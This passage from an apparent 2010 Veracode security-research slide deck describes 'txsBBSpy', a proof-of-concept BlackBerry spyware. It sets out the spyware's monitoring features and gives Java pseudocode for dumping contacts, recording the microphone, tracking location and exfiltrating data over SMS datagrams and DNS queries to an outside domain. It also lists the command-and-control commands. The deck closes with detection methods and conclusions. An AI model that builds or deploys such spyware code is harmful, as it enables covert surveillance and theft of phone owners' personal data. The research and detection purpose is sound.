files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code. .JAD files: An application descriptor that stores information about the application itself and the location of .COD files .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata. .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 36
37.
txsBBSpy Effects and
Behaviors © 2010 Veracode, Inc. 37
38.
txsBBSpy Logging and
Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
39.
txsBBSpy Exfiltration and
C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
40.
txsBBSpy Technical Specifications ©
2010 Veracode, Inc. 40
41.
Technical Methods Data
Dumpers Listeners Exfiltration Methods Command and Control © 2010 Veracode, Inc. 41
42.
Dump Contact Information
API – javax.microedition.pim – net.rim.blackberry.API.pdap Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
43.
Dump Microphone API
– javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 43
44.
Location Listener Create
the class that implements LocationListener Interface Get LocationProvider instance Add LocationListener API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 47
45.
SMS Outbound Listener
Create class that implements “SendListener” interface Add the SendListener API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 48
46.
PIM Listener Create
the class that implements PIMListListener Interface Open Target PIMList and Add PIMListListener API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 51
47.
SMS Datagram Exfiltration
API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 52
48.
DNS Exfiltration do {
// Code to trim the message to 200 chars per iteration } try { msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false); conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444 "); conn.close(); } catch (ConnectionNotFoundException e) { return; } catch (IOException e){ // Do nothing, just catch and ignore } } while (msg.length() > 200); © 2010 Veracode, Inc. 54
49.
Threaded Exfiltration Listener
based exfiltration methods use separate thread Doesn‟t freeze UI interface Queues messages outbound if network is slow ThreadedSend extends Thread class Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 58
50.
Command and Control
Channels Default is inbound SMS communication Bi-drectional TXSPROTO TCP based command and control – Additional Stealth (intentionally not completely invisible) – Allows for pretty GUI clients (basic mock up done) – Will more easily allow for control of multiple victims – Can be used to easily implement novelty attacks Swap the contact databases of two victims Easily have phone A call phone B Integrated Google earth tracking of victim without parsing return email responses Much more shenanigans! © 2010 Veracode, Inc. 59
51.
Command and Control
Channels initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 60
52.
Methods of Detection
and Future Work © 2010 Veracode, Inc. 61
53.
Methods of Detection
Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration Signature Based – This is how the current anti-virus world is failing Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 62
54.
Future Work (Offensive
AND Defensive) Reverse engineer .cod file format Continued research into unobstructed installation methods (requires exploitation) Infect PC with virus that acts as distribution hub Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 63
55.
Demonstration © 2010 Veracode,
Inc. 64
56.
Conclusion We are
currently trusting the vendor application store provider for the majority of our mobile device security Minimal methods of real time eradication or detection of spyware type activities No easy/automated way to confirm for ourselves what the applications are actually doing © 2010 Veracode, Inc. 65
57.
The Monkey Steals
the Berries! Questions? © 2010 Veracode, Inc. 66
58.
Questions?